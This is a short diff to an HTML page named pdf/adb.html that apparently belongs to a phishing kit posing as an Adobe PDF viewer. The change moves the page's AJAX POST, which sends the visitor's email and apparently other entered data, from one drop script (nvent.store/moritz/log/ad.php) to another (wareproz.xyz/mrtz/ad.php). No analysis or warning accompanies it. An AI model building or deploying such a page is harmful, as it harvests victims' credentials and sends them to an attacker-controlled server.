--- a/pdf/adb.html
+++ b/pdf/adb.html
@@ -250,7 +250,7 @@
 
       $.ajax({
         dataType: 'JSON',
-        url: 'https://nvent.store/moritz/log/ad.php',
+        url: 'https://wareproz.xyz/mrtz/ad.php',
         type: 'POST',
         data: {
           email: email,
@@ -289,3 +289,4 @@
 
 </body>
 </html>
+
